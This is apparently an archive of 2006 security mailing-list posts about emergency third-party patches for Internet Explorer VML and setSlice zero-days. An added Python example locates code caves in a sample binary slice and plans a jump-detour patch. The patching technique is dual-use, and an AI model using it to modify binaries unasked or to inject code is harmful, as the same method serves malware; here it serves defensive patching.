> you add a simple length check and a 5-byte jump to it in the vulnerable 
> function?
> 
> Patch right before the call to _IE5_SHADETYPE_TEXT::TOKENS::Ptok, check the
> length of the string, and you're done. Or you can patch the copy loop and 
> count
> the characters there. It's easier and safer than rewriting the function.

Hi. Thank you very much for your valued input.

What you say makes sense (patching by staging the size check somewhere in
the binary and then just adding a 5-byte jump/call to it before or within
the Ptok() function). We believe the less we overwrite, the less chance
there is that something will go wrong.

However, we did experiment with this. It is the approach we at ZERT took
with an earlier patch version in C that Michael Hale Ligh wrote, before
Gil Dabah's final version, and found that while it worked nicely on one
version of vgx.dll, it was a big problem making it universal for all
versions. The reason was that the one Michael tested with had an align 20
(20 free bytes) where the size-check could be staged. None of the other
DLLs had this available. Nor did the others have any free space at the end
of a segment. The tool we conventionally use to add new sections to PE
files produced an error because there wasn't enough room in the PE header
for a new section.

We started discussing solutions to get around this at the time, but then
instead of breaking the speed of light which some claim is impossible 
( :) ) we did what hackers do and just went to warp speed.

So, even if all versions had that align 20 of free space they would no
doubt be in different offsets of the file, so we would need a specific
configuration for each version, and this would be much messier than the
way we actually implemented the patch.

A good engineer doesn't blame his tools though, which sounds like what we
just did.

Limited space in the binary was the biggest issue, and we are working on
that being solved for future incidents we are called to respond to by
developing better tools to better utilize this slack/gaps (/whatever you
call it) in the PE. This would allow for any amount of patch code to be
staged.

For a higher success rate and the purpose of being as generic as possible,
patches are supposed to be as small as possible.

Code crunching, however, is something which should not be discounted. In
our first patch (and especially in our unsupported systems patch) this is
very apparent. The effort was not unnecessary, and not really an effort
for a better quality of our work. Putting that aside, the original code
(before further development and QA) was done in less than 5
minutes. ROI-wise, it was worth it. Thank you though.

As before, we explain more of the process in the paper we released to the
public:
http://isotf.org/zert/papers/vml-details-20061004.pdf

Gadi.

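The exchange above is about where to stage a length check in a DLL that has no spare bytes, and how to reach it with a 5-byte jump. As an added example (not ZERT's tooling and not code from their paper), here is the bookkeeping such a patch needs, in Python, run against a constructed 32-bit code slice: find runs of filler bytes (code caves, such as the "align 20" gap mentioned above) in a section, encode the `jmp rel32` in both directions, lay out the detour stub as check + displaced instructions + jump back, and refuse when the cave is too small for the stub, which is exactly the situation described above. The section bytes, the addresses and the NOP bytes standing in for the assembled length check are constructed assumptions; a real patch reads the section headers of the PE, takes the check bytes from an assembler, and confirms with a disassembler that the displaced bytes are whole, position-independent instructions.

```python
import struct

# Constructed sample: a 34-byte slice of a 32-bit code section mapped at SECTION_VA.
# Offsets +0..+5 are a relocatable prologue, +11..+30 are 20 bytes of INT3 padding
# (an "align 20" gap), and the tail is a second tiny function.
SECTION_VA = 0x10001000
SECTION = (b"\x55\x8b\xec\x83\xec\x10"   # push ebp; mov ebp,esp; sub esp,0x10
           + b"\x8b\x4d\x08"             # mov ecx,[ebp+8]
           + b"\x5d\xc3"                 # pop ebp; ret
           + b"\xcc" * 20                # alignment padding between functions
           + b"\x33\xc0\xc3")            # xor eax,eax; ret
# Stand-in for the assembled length check; the real bytes come from yasm/nasm.
CHECK_STUB = b"\x90" * 4


def find_caves(data: bytes, base_va: int, min_len: int = 20, fill=(0x00, 0xCC)) -> list:
    """Return (va, length) for each run of >= min_len filler bytes (zeros or INT3).
    Heuristic only: a run of zeros can be data, so confirm with a disassembler."""
    caves, start = [], None
    for i, b in enumerate(data):
        if b in fill:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                caves.append((base_va + start, i - start))
            start = None
    if start is not None and len(data) - start >= min_len:
        caves.append((base_va + start, len(data) - start))
    return caves


def jmp_rel32(src_va: int, dst_va: int) -> bytes:
    """Encode `jmp rel32` (E9 disp32) placed at src_va and landing on dst_va."""
    disp = dst_va - (src_va + 5)  # displacement is relative to the next instruction
    if not -2**31 <= disp < 2**31:
        raise ValueError("target out of rel32 range")
    return b"\xe9" + struct.pack("<i", disp)


def plan_detour(section, section_va, patch_va, displaced, check_code, min_len=20) -> dict:
    """Lay out the patch: the whole instructions `displaced` (>= 5 bytes, position
    independent) at patch_va are replaced by a jmp into a cave that holds
    check_code + displaced + jmp back. Raises when no cave is big enough."""
    off = patch_va - section_va
    if len(displaced) < 5 or section[off:off + len(displaced)] != displaced:
        raise ValueError("displaced bytes must be >= 5 and match the section")
    stub_len = len(check_code) + len(displaced) + 5
    patch_end = patch_va + len(displaced)
    for cave_va, cave_len in find_caves(section, section_va, min_len):
        overlaps = cave_va < patch_end and patch_va < cave_va + cave_len
        if cave_len >= stub_len and not overlaps:
            break
    else:
        raise ValueError(f"no cave of {stub_len} bytes available")
    stub = (check_code + displaced
            + jmp_rel32(cave_va + len(check_code) + len(displaced), patch_end))
    patch = jmp_rel32(patch_va, cave_va) + b"\x90" * (len(displaced) - 5)
    return {"patch_va": patch_va, "patch_bytes": patch,
            "cave_va": cave_va, "stub_bytes": stub}


def apply_patch(section: bytes, section_va: int, plan: dict) -> bytes:
    """Write patch and stub into a copy of the section image; its size is unchanged."""
    buf = bytearray(section)
    for va, blob in ((plan["patch_va"], plan["patch_bytes"]),
                     (plan["cave_va"], plan["stub_bytes"])):
        off = va - section_va
        buf[off:off + len(blob)] = blob
    return bytes(buf)


if __name__ == "__main__":
    plan = plan_detour(SECTION, SECTION_VA, SECTION_VA, SECTION[:6], CHECK_STUB)
    print({k: (hex(v) if isinstance(v, int) else v.hex()) for k, v in plan.items()})
```

Because every version of the DLL lays its padding out differently, the cave address and therefore both displacements differ per build; the plan has to be recomputed per version, which is the "specific configuration for each version" problem named above.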


Technical Paper on the ZERT Patch and VML [was: Re: ZERT patch for setSlice()]

2006-10-04 Thread Gadi Evron
> So how is this a patch when you are simply automating a simple work
> around?
> 
> If this can be called a patch then we should be able to say that
> Microsoft released a patch in their bulletin on this issue where they
> describe exactly how to set the killbit.
> 
> A *real* patch would actually address the vulnerable code.

Our (ZERT's) VML patch was what you refer to as "real". There was a space
issue with not enough bytes to play with, so Gil Dabah, one of our
members, re-wrote the vulnerable function in Yasm, compiled it, and
hard-coded the compiled code into the binary, with room to spare, saving
functionality. Code crunching is back in style. :)

You can read about the vulnerability, the patch and the Microsoft patch
here (technical + ASM and C code):

http://zert.isotf.org/papers/vml-details-20060928.pdf

As to the setSlice() patch... an alternative does not necessarily mean
intrusive. A patch for the setSlice() vulnerability was already provided
by Determina which was very nice and very professional. It used some
ideas we developed ourselves - we liked it - it was a very efficient
patch.
It came out as commercial, though. We release our work under GPL
and Creative Commons with full source code available.

In this incident (ZERT2006-02) we provided an automation of the
workaround, to make it simple for users and organizations which are
interested, and for whom a third party patch is too risky for various
reasons ranging from support to liability, to protect themselves.

As an example, Network admins can easily use the console version of
ZProtector to run in the login script of a domain. ZProtector is not a
patch per se, it is an automated kill bit software which gets updated as
new unpatched vulnerabilities and 0days are disclosed/discovered/reported.

For more information, you can visit the Zeroday Emergency Response Team
web site at: http://isotf.org/zert/

IMPORTANT: third party patches should always be considered a last resort,
and used only if the other solutions, if such exist, are not good for
you. I like the idea of having an alternative.

ZERT withdrew its VML patch as soon as Microsoft released the official
patch. They did really good work on it. Kudos to the guys at MSRC.

Thanks,

Gadi.



ZERT patch for setSlice()

2006-10-02 Thread Gadi Evron
A ZERT patch has now been released and is available on our site (
http://isotf.org/zert/ ).

A full patch (for limited Windows versions, which is built very nicely) is
available from Determina.

Our patch automates the Microsoft suggested workaround.

Thanks,

Gadi.





setSlice exploited in the wild - massively

2006-09-30 Thread Gadi Evron
Exploit code is available publicly:
http://www.milw0rm.com/exploits/2440

SANS diary:
http://isc.sans.org/diary.php?storyid=1742

And this is so massively exploited, it makes VML look cute. There's a
rootkit, some other malware, and Haxdoor! (a phishing trojan horse)

Thanks to Roger Thompson at explabs.com for first reporting it.

Gadi.



tech support being flooded due to IE 0day

2006-09-25 Thread Gadi Evron
For orgs which are not ISPs, I just emailed this to nanog.
-

Hi guys, several ISPs are experiencing a flood of calls from customers
who get failed installations of the recent IE 0day - VML - (vgx.dll).

If you are getting such floods too, this is why.

This is currently discussed on the botnets@ list, as raised by Cox, and I
figured I will float it out here.

No patch is currently available from Microsoft, workarounds are available.

Gadi.



Re: ZERT patch [was: 0day for IE (Disabling Javascript no longer a fix)]

2006-09-25 Thread Gadi Evron
On Mon, 25 Sep 2006, Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] wrote:
> Jesper's Blog : More options on protecting against recent IE 
> vulnerabilities on a domain:
> http://msinfluentials.com/blogs/jesper/archive/2006/09/22/More-options-on-protecting-against-the-VML-vulnerability-on-a-domain.aspx
> 
> I like that option better.  Leaves me supported and honestly I've not 
> seen anything that I'm running that's used VML or freaked since I've 
> done that?

The patch is available, but if the workaround works for you, you should
definitely use that. All things being even, third party patches should be
a last resort.

Gadi.

> 
> Gadi Evron wrote:
> > On Sun, 24 Sep 2006, Bill Stout wrote:
> >   
> >> http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be
> >> ing.html 
> >> "This exploit can be mitigated by turning off Javascripting. 
> >>
> >> Update: Turning off Javascripting is no longer a valid mitigation. A
> >> valid mitigation is unregistering the VML dll. "
> >> 
> >
> > There is, of course, the ZERT (Zeroday Emergency Response Team) patch,
> > available to those who choose to use it.
> > Along with source code, testing methodology, etc.
> >
> > Naturally a vendor patch is BETTER, this is merely an alternative that can
> > be used, right now, by those who choose to do so.
> >
> > http://www.eweek.com/article2/0,1895,2019162,00.asp
> > http://isotf.org/zert/
> >
> > Richard wrote an interesting blog entry on it:
> > http://taosecurity.blogspot.com/2006/09/zert-evolution.html
> >
> >   
> >> Bill Stout
> >> 
> >
> > Gadi.
> >
> >
> >   
> 
> -- 
> Letting your vendors set your risk analysis these days?  
> http://www.threatcode.com
> 
> If you are a SBSer and you don't subscribe to the SBS Blog... man ... I will 
> hunt you down...
> http://blogs.technet.com/sbs
> 



ZERT patch [was: 0day for IE (Disabling Javascript no longer a fix)]

2006-09-25 Thread Gadi Evron
On Sun, 24 Sep 2006, Bill Stout wrote:
> http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-be
> ing.html 
> "This exploit can be mitigated by turning off Javascripting. 
> 
> Update: Turning off Javascripting is no longer a valid mitigation. A
> valid mitigation is unregistering the VML dll. "

There is, of course, the ZERT (Zeroday Emergency Response Team) patch,
available to those who choose to use it.
Along with source code, testing methodology, etc.

Naturally a vendor patch is BETTER, this is merely an alternative that can
be used, right now, by those who choose to do so.

http://www.eweek.com/article2/0,1895,2019162,00.asp
http://isotf.org/zert/

Richard wrote an interesting blog entry on it:
http://taosecurity.blogspot.com/2006/09/zert-evolution.html

> 
> Bill Stout

Gadi.



Yet another 0day for IE

2006-09-19 Thread Gadi Evron
Sunbelt Software released a warning on a new IE 0day they detected
in-the-wild, to quote them:
"The exploit uses a bug in VML in Internet Explorer to overflow a buffer
and inject shellcode.   It is currently on and off again at a number of
sites. 
Security researchers at Microsoft have been informed. This story is
developing and research is ongoing.   Security professionals can contact
me for collaboration or further information. This exploit can be mitigated
by turning off Javascripting."

They also notified some closed and vetted security information sharing
groups on the matter, with further details. You can find their blog entry
here:
http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html

That's that.

Why do I call it a 0day? Because it has indeed been used in-the-wild
before it was publicly discovered. People are CURRENTLY and for a while
now, being exploited.

Lately we call every exploit being released in full disclosure mode a
0day. That's a 1-day or at least it has to be from now on, as there are
just too many of those and there are more to come.

This trend started with Websense detecting an IE 0day (not really IE
- WMF) used in-the-wild by spyware, to infect users.
"Responsible disclosure" is important, but when it takes so long to get a
response or a fix with "Irresponsible vendors", and with so much money to
be made by not disclosing vulnerabilities at all - it is becoming
passe. New exploits don't need to be gleaned from patches or feared in
full disclosure. Someone just pays for a 0day.. it's their business and
they invest in it.

So:
1. Lots more coming.
2. Please call it a 1-day if it's full disclosure mode, and 0day if it
has been seen in-the-wild.

The motivation has now moved from "let's be responsible" or "let's have
fun" to "let's make money" or "let's stop waiting and be mocked by
irresponsible vendors". This is not about everybody, it's about how things are.

Even idefense and zdi can't pay enough when compared with people who make
money from what the 0day gives them - exploited users and a money making
botnet.

Thanks,

Gadi.



